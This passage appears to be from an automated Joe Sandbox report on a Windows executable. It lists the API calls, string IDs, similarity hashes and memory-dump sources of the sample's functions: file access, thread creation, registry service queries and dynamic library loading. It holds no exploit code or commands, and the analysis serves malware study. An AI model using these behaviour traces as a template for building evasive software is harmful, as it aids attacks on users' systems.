                                                                  • Associated: the same eleven dumps as listed in full for the first function in this listing (identical list, not repeated)
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free$File$Alloc$CloseCreateHandleModuleNameSize
                                                                  • String ID:
                                                                  • API String ID: 1079676353-0
                                                                  • Opcode ID: 4e0c200c8c15de1c34501c1501da476887ff163203a424eaa44262bbe6b8bc17
                                                                  • Instruction ID: 17315ba9b804ea5b43f0dc8ea45a8c146efaa34e73fe8ad2d9cbea40495e9014
                                                                  • Opcode Fuzzy Hash: 4e0c200c8c15de1c34501c1501da476887ff163203a424eaa44262bbe6b8bc17
                                                                  • Instruction Fuzzy Hash: 6561A5B57043446BE724EBB5EC56FFB739CEB88714F40082AF549C3291DA79EC108666
                                                                  APIs
                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,00001388), ref: 0041C2CB
                                                                  • WaitForSingleObject.KERNEL32(?,00002710(dwMilliseconds=10000, a 10 s timeout),?,?,?,?,?,?,?,?,?,00001388), ref: 0041C2E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: the same eleven dumps as listed in full for the first function in this listing (identical list, not repeated)
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSingleSleepWait
                                                                  • String ID: '$.$0$2$4$:$:$C$I$M$U$V$Y$d$l$z${
                                                                  • API String ID: 309074506-2986699499
                                                                  • Opcode ID: eb96c70319cd0b3451e5825f8352d491de8bb6029cd1e33e93e4916a575053ba
                                                                  • Instruction ID: fcf21cc62856f80bb5c310aab61f0a24f3f1c6b30d2e4690c96e373a58e0fda4
                                                                  • Opcode Fuzzy Hash: eb96c70319cd0b3451e5825f8352d491de8bb6029cd1e33e93e4916a575053ba
                                                                  • Instruction Fuzzy Hash: 3CB18C3150C3C1CAD321CB39988478BFFE46BA6714F484A5EF5E5972D2C2798149CB6B
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104(MAX_PATH),00000000), ref: 00412C26
                                                                  • GetLocalTime.KERNEL32(0000003C), ref: 00412C31
                                                                  • CreateFileA.KERNEL32(?,40000000(GENERIC_WRITE),00000000,00000000,00000002(CREATE_ALWAYS),00000000,00000000), ref: 00412C4B
                                                                  • WriteFile.KERNEL32(00000000,000000E6,00000010(16 bytes, which is sizeof(SYSTEMTIME), the structure GetLocalTime filled just before),0000003C,00000000), ref: 00412C62
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412C69
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: the same eleven dumps as listed in full for the first function in this listing (identical list, not repeated)
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateEnvironmentExpandHandleLocalStringsTimeWrite
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
                                                                  • API String ID: 2838349079-1073058172
                                                                  • Opcode ID: 37388e250c0d3da558317f92ab88a6508f4e7bf2038ca778009507825cbacb26
                                                                  • Instruction ID: 9d5602a8bff07f8f1bd6dde567594dbbd8fa68865cf92d56b2b83de2356b4480
                                                                  • Opcode Fuzzy Hash: 37388e250c0d3da558317f92ab88a6508f4e7bf2038ca778009507825cbacb26
                                                                  • Instruction Fuzzy Hash: 4C41112010C3C199D322D7389848B8FBFD15BA7218F488B9DF1E45A2D2C2759249C7AB
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104(MAX_PATH),00000001), ref: 004121E0
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 004121FF
                                                                  • LoadLibraryA.KERNEL32(?,00000000), ref: 00412252
                                                                  • GetProcAddress.KERNEL32(00000000,0042E3F0(lpProcName: string at 0042E3F0)), ref: 004122AC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: the same eleven dumps as listed in full for the first function in this listing (identical list, not repeated)
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressAttributesEnvironmentExpandFileLibraryLoadProcStrings
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
                                                                  • API String ID: 925820237-1073058172
                                                                  • Opcode ID: 131d082f9de17865684a3e021f0ddc608ce7fca9326b0bc6ab7601fe30902281
                                                                  • Instruction ID: 95e2059b24e6b08625558fafe1d9927b9274d35295d34d11aa50597a438a658b
                                                                  • Opcode Fuzzy Hash: 131d082f9de17865684a3e021f0ddc608ce7fca9326b0bc6ab7601fe30902281
                                                                  • Instruction Fuzzy Hash: C651631010C3D19AD311DB39989579BBFD45BA7328F485A9DF4E8472D3C269820DC76B
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000000), ref: 00412AB6
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00412AD0
                                                                  • ReadFile.KERNEL32(00000000,000000E6,00000010,?,00000000), ref: 00412B02
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412B09
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: File$CloseCreateEnvironmentExpandHandleReadStrings
• String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
• API String ID: 2873326616-1073058172
• Opcode ID: 71fe3081bd5b8bd7161fbc035ce1e9a9d4373e19c6f6c250aca107c39a209abf
• Instruction ID: 8c6ea43fa09a3286770b603215ecff93b091f737eb22e7810364243bb09da271
• Opcode Fuzzy Hash: 71fe3081bd5b8bd7161fbc035ce1e9a9d4373e19c6f6c250aca107c39a209abf
• Instruction Fuzzy Hash: 4E41032010C3C199D322D73C984878FBFD55BA7318F488B9DF1E85A2D2D3A99649C76B
APIs
• ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000000), ref: 0040B70E
• CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B728
• ReadFile.KERNEL32(00000000,004310B8,00000004,?,00000000), ref: 0040B744
• CloseHandle.KERNEL32(00000000), ref: 0040B760
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: File$CloseCreateEnvironmentExpandHandleReadStrings
• String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
• API String ID: 2873326616-1073058172
• Opcode ID: c114ea442860f0f80da07236d5853267047690d1852017ad31ebe147657299ea
• Instruction ID: c9ca788773da980f5d214099c4e0c2fa05920a1819a7867e2b669ae635df4d4e
• Opcode Fuzzy Hash: c114ea442860f0f80da07236d5853267047690d1852017ad31ebe147657299ea
• Instruction Fuzzy Hash: 6341142010C3C199D322DB28984874FBFD15BA6718F588A5DF1E85B2E2C3B5964DC76B
APIs
• ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000001), ref: 0040B868
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040B882
• WriteFile.KERNEL32(00000000,004310B8,00000004,?,00000000), ref: 0040B899
• CloseHandle.KERNEL32(00000000), ref: 0040B8A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: File$CloseCreateEnvironmentExpandHandleStringsWrite
• String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
• API String ID: 4155862527-1073058172
• Opcode ID: 9273c5595a96b2405ab5af5d902c7359953e1080390114a057f2b0281a9bc69d
• Instruction ID: baa3cae5f5ab34e93cfd813ff7becf06d1d45a190b3b457302884b7f26e423b1
• Opcode Fuzzy Hash: 9273c5595a96b2405ab5af5d902c7359953e1080390114a057f2b0281a9bc69d
• Instruction Fuzzy Hash: E831232014D3C1D9D312D7289848B8FBFD05BA7318F488A5DF1D85A2D2C3B9824DC767
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: _strrchrlstrcmpi
• String ID: 8$I$h$h$h$l$m$p$p$p$s$s$t$t
• API String ID: 2999501412-836531014
• Opcode ID: ccec61454f6af3ee337d9bff48b7e251726acd3afa5ded9e8444d64063ddd766
• Instruction ID: 3f20e5aee60d72e1d420386b93ed5b1cec2b7467db128eb5dee041a04ac3d7e4
• Opcode Fuzzy Hash: ccec61454f6af3ee337d9bff48b7e251726acd3afa5ded9e8444d64063ddd766
• Instruction Fuzzy Hash: B771C07540D3C28AD326CB288040B9BFBE1ABD6204F448E6EE5D947391E7B59109CB67
APIs
• ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004010E1
• CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004010FB
• CloseHandle.KERNEL32(00000000), ref: 0040111C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: CloseCreateEnvironmentExpandFileHandleStrings
• String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z
• API String ID: 1403605771-759814561
• Opcode ID: ca9cc3af777dddaed0d5913db1498ae4339569db94bec9ca99ba58dbe94e5d40
• Instruction ID: 312b795b5e56d1041d03fccaae8dae33a3be811c4841049efce2031e4c952a66
• Opcode Fuzzy Hash: ca9cc3af777dddaed0d5913db1498ae4339569db94bec9ca99ba58dbe94e5d40
• Instruction Fuzzy Hash: 5B31FC2010C3C1D9E322D738985974FBFD15BA7318F588A9DF1E95B2D2C2B98249C7A7
APIs
• ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004017D1
• CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004017EB
• CloseHandle.KERNEL32(00000000), ref: 0040180C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: CloseCreateEnvironmentExpandFileHandleStrings
• String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z
• API String ID: 1403605771-759814561
• Opcode ID: 913cc769b66229c6b909c85032c4fd2047f7c90766c012ad0f461adb7c7f1a52
• Instruction ID: cf6603b6467a36f1b1fe48ee20707507a00a8aaa8c14109d76319268d20f67da
• Opcode Fuzzy Hash: 913cc769b66229c6b909c85032c4fd2047f7c90766c012ad0f461adb7c7f1a52
• Instruction Fuzzy Hash: 1131FC2010C3C199E322D738985874FBFD15BA7318F588A9DF1E95B2D2C2B98249C7A7
APIs
• ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 00401221
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040123B
• CloseHandle.KERNEL32(00000000), ref: 00401242
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: CloseCreateEnvironmentExpandFileHandleStrings
• String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z
• API String ID: 1403605771-759814561
• Opcode ID: eae75d6211b48766a2a4855af57f21a379476b10d3c7f040af184a083788c328
• Instruction ID: 183227d0d47840c6fb137b2e72691f3ad759e2d74dad290b7fbfcb0fd45e1397
• Opcode Fuzzy Hash: eae75d6211b48766a2a4855af57f21a379476b10d3c7f040af184a083788c328
• Instruction Fuzzy Hash: B631DC2010C3C1D9E322D738984974FBFD11BA7218F588A9DF1E95A2D2C2B99249C767
APIs
• GetTempPathA.KERNEL32(00000104,?,74DF0440), ref: 00419B01
• GetTempFileNameA.KERNEL32(?,0042E290,00000000,?), ref: 00419B1B
• WaitForSingleObject.KERNEL32(00000014,000000FF,00000000,000000EE), ref: 00419B49
• ReleaseMutex.KERNEL32(00000014,?,?,?,00000005,?,?,?,00000006,?,?), ref: 00419FB1
• DeleteFileA.KERNEL32(?,?,?,?,?,?,?,00000005,?,?,?,00000006,?,?), ref: 0041A0B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: FileTemp$DeleteMutexNameObjectPathReleaseSingleWait
                                                                  • String ID: %d:%d,$)$5$7$A$H$P$Z$t$u
                                                                  • API String ID: 3931662400-3265384
                                                                  • Opcode ID: fbd0aa01bd745ed4f8e17624d07f534a33e09d32544fa6f8117615c808823477
                                                                  • Instruction ID: 87167e95f2216398dbb744b78034f6cdc2098f1725ccaa65e6176ba6f2cbe2f0
                                                                  • Opcode Fuzzy Hash: fbd0aa01bd745ed4f8e17624d07f534a33e09d32544fa6f8117615c808823477
                                                                  • Instruction Fuzzy Hash: F902F2351083908FC721CF28D8A1AE7BFE0AF96314F48965DE8D5473A2D375D849CB9A
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0042A464
                                                                  • _strcat.LIBCMT ref: 0042A477
                                                                  • _strlen.LIBCMT ref: 0042A484
                                                                  • _strlen.LIBCMT ref: 0042A493
                                                                  • _strncpy.LIBCMT ref: 0042A4AA
                                                                  • _strlen.LIBCMT ref: 0042A4B3
                                                                  • _strlen.LIBCMT ref: 0042A4C0
                                                                  • _strcat.LIBCMT ref: 0042A4DE
                                                                  • _strlen.LIBCMT ref: 0042A526
                                                                  • GetStdHandle.KERNEL32(000000F4,0042EEC0,00000000,?,00000000,00000000,00000000,00000000), ref: 0042A531
                                                                  • WriteFile.KERNEL32(00000000), ref: 0042A538
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                  • API String ID: 3601721357-4022980321
                                                                  • Opcode ID: ce5f139c050410a4046e1cfe4d55637e7050fe717ca944e6fdfc0d3b7405f9c1
                                                                  • Instruction ID: 74c76adfd133b4e9a18e4e1925237b71ce4d4ae5635836e3a3127bb511270d61
                                                                  • Opcode Fuzzy Hash: ce5f139c050410a4046e1cfe4d55637e7050fe717ca944e6fdfc0d3b7405f9c1
                                                                  • Instruction Fuzzy Hash: 763128327401246BD720BBB6BC86EAB73A8EB44308F94042FFD15D3152EA7C9595C72D
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,00000104,00000104), ref: 00408348
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: EnvironmentExpandStrings
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
                                                                  • API String ID: 237503144-1073058172
                                                                  • Opcode ID: 6fad4a32500c4ba3f8a82e59dce4a452e749217753927d1ac47079a33b539138
                                                                  • Instruction ID: dca6d9ca4d919790161e68c6a6737a5004210cde6544d660ad85851be413fbda
                                                                  • Opcode Fuzzy Hash: 6fad4a32500c4ba3f8a82e59dce4a452e749217753927d1ac47079a33b539138
                                                                  • Instruction Fuzzy Hash: 6C41DC1000C7C29DD312D73C955864FBFD15BE7228F488B9DF0E95B2E2D6698249C7A7
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,00000015,74DE83C0,00000000), ref: 004241EF
                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0042420C
                                                                  • RegQueryValueExA.ADVAPI32(?,ServiceName,00000000,?,?,?), ref: 00424264
                                                                  • lstrcpyA.KERNEL32(?,00000000,?,00000008), ref: 004242C0
                                                                  • RegQueryValueExA.ADVAPI32(?,Description,00000000,?,?,?), ref: 004242E8
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00424349
                                                                  • RegQueryValueExA.ADVAPI32(?,Title,00000000,?,?,?), ref: 00424378
                                                                  • wsprintfA.USER32 ref: 004243AA
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004243BD
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004243CD
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: QueryValue$CloseOpenlstrcpy$wsprintf
                                                                  • String ID: Description$ServiceName$Title$[%d] %s
                                                                  • API String ID: 3166188874-1473919770
                                                                  • Opcode ID: 19b7f30f3d2a41f17fe764a6f9fad9a6bbe25cb027da63ad8d5f2e9f9482e0bf
                                                                  • Instruction ID: 50b48e229a94bbbaf40ab9f963702833861e6e57dc731b51fdf7295a7017bae1
                                                                  • Opcode Fuzzy Hash: 19b7f30f3d2a41f17fe764a6f9fad9a6bbe25cb027da63ad8d5f2e9f9482e0bf
                                                                  • Instruction Fuzzy Hash: 0CE123205087CEDDDF22CB7C98486CD7F955B27328F484389F9E45A2E2C3A9854AC776
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0042E7A0,00000118,0042485B,00000001,00000000,0042E4C0,00000008,0042A54F,00000000,00000000,00000000), ref: 00426582
                                                                  • _strcat.LIBCMT ref: 00426598
                                                                  • _strlen.LIBCMT ref: 004265A8
                                                                  • _strlen.LIBCMT ref: 004265B9
                                                                  • _strncpy.LIBCMT ref: 004265D3
                                                                  • _strlen.LIBCMT ref: 004265DC
                                                                  • _strcat.LIBCMT ref: 004265F8
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                  • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!$B
                                                                  • API String ID: 3058806289-85196374
                                                                  • Opcode ID: e85ed9134b3ae6f9a248eff3a8fb49e701f2d1d72a83a6c7e4bd4b035122a1bd
                                                                  • Instruction ID: 89b9faee52e55a897ce7ba6d50dd28e9919cf87c3f188bd51213c475bd47c2d4
                                                                  • Opcode Fuzzy Hash: e85ed9134b3ae6f9a248eff3a8fb49e701f2d1d72a83a6c7e4bd4b035122a1bd
                                                                  • Instruction Fuzzy Hash: C331C732B012347BD715ABA6BC42FDE37689F09318FD4045BF904A6282DB7CDA918B5D
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,74DF0A60,00000000,00425E71,?,0042E598,00000060), ref: 00427138
                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00427150
                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042715D
                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042716A
                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00427177
                                                                  • FlsAlloc.KERNEL32(00426FD9,?,0042E598,00000060), ref: 004271B4
                                                                  • FlsSetValue.KERNEL32(00000000,?,0042E598,00000060), ref: 004271E1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004271F5
                                                                    • Part of subcall function 00426F4B: FlsFree.KERNEL32(00000005,0042720A,?,0042E598,00000060), ref: 00426F56
                                                                    • Part of subcall function 00426F4B: DeleteCriticalSection.KERNEL32(00000000,00000000,00000000,?,0042720A,?,0042E598,00000060), ref: 0042749C
                                                                    • Part of subcall function 00426F4B: DeleteCriticalSection.KERNEL32(00000005,00000000,?,0042720A,?,0042E598,00000060), ref: 004274C6
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                  • API String ID: 2635119114-282957996
                                                                  • Opcode ID: b87ad60a131d164c28d5f70f0fad35323593ccf2417c63438c26ed16432ab973
                                                                  • Instruction ID: 86349d13d9d697d1a2059cccb8833edb385c7957e5e4b5f87f3c94e81b02547f
                                                                  • Opcode Fuzzy Hash: b87ad60a131d164c28d5f70f0fad35323593ccf2417c63438c26ed16432ab973
                                                                  • Instruction Fuzzy Hash: 1B2180707042619AD724AF37BE09A667FB5EB467103A1113BF644C32A0DBB8840ACF6C
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,-00000023,?,00000023), ref: 0041B170
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041B284
                                                                    • Part of subcall function 0041AD70: lstrlenA.KERNEL32 ref: 0041ADCA
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: ($*$0$F$I$Y$[$b$n$p$r$x
                                                                  • API String ID: 1659193697-2061847989
                                                                  • Opcode ID: 0aacacd1b8cdbe4c7b6c9d18da774663ceb4049ca215048843e45ef287c2fd62
                                                                  • Instruction ID: 2df139c3096c9c4d925bdfeecfd17c6d27e21bb7b6dfed262cfb59e6470ea8b3
                                                                  • Opcode Fuzzy Hash: 0aacacd1b8cdbe4c7b6c9d18da774663ceb4049ca215048843e45ef287c2fd62
                                                                  • Instruction Fuzzy Hash: 76A13A2110C7C28AC322DA3C589859FBFD55EA7228F480B9EF0E5472E2C7558549C7AB
                                                                  APIs
                                                                    • Part of subcall function 00401000: ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004010E1
                                                                    • Part of subcall function 00401000: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004010FB
                                                                  • CreateThread.KERNEL32(00000000,00000000,004158B0,?,00000000,?), ref: 00401292
                                                                  • CreateThread.KERNEL32(00000000,00000000,00406580,?,00000000,?), ref: 004012AC
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004012BA
                                                                  • CreateThread.KERNEL32(00000000,00000000,0041C0F0,?,00000000,?), ref: 004012E0
                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000001,000000FF), ref: 004012FF
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040BB70,?,00000000,?), ref: 00401324
                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000001,000000FF), ref: 0040133F
                                                                  • CloseHandle.KERNEL32(?), ref: 00401348
                                                                  • SetEvent.KERNEL32(?), ref: 0040135A
                                                                  • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,00000000,00000001), ref: 00401388
                                                                  • CloseHandle.KERNEL32(00000001), ref: 0040138F
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004013A0
                                                                  • CloseHandle.KERNEL32(?), ref: 004013AB
                                                                  • SetEvent.KERNEL32 ref: 004013B0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Create$ThreadWait$CloseEventHandle$MultipleObjectObjectsSingle$EnvironmentExpandFileStrings
                                                                  • String ID:
                                                                  • API String ID: 94205885-0
                                                                  • Opcode ID: f714fd7dc9cf1b848fcbf6baa3b872f43579e6a1c41cad7c9b60e9636e7f0812
                                                                  • Instruction ID: 109f3496b703d5c848b0bbf75510f44b12918ce008f531d148e58f88355e5c24
                                                                  • Opcode Fuzzy Hash: f714fd7dc9cf1b848fcbf6baa3b872f43579e6a1c41cad7c9b60e9636e7f0812
                                                                  • Instruction Fuzzy Hash: 8E414F71244301AFE320DB65CC86F7BB3E8ABC8B14F504A2DF695A72D0DA74E8458B59
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(user32.dll,0042E5E8,?,?), ref: 0042ADE9
                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0042AE05
                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042AE16
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042AE23
                                                                  • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0042AE39
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042AE4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                  • API String ID: 2238633743-1612076079
                                                                  • Opcode ID: 1e07f3a9dedf5d83c3b40c4b76d854943183329d44e916a5c801173aea8fc7a5
                                                                  • Instruction ID: 70b5fa524dff6b7417458b24b0bac14766b51569b5ba9c55d5771b2b321c63c1
                                                                  • Opcode Fuzzy Hash: 1e07f3a9dedf5d83c3b40c4b76d854943183329d44e916a5c801173aea8fc7a5
                                                                  • Instruction Fuzzy Hash: 6B21A730740326ABDB119F75BE84B6B3BE8AB04740B51143BED01D6190D7BCC81ADB6E
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,74DE8A60,00406532,?, :\,?,?,?), ref: 00406275
                                                                  • CreateFileMappingA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406292
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040629F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
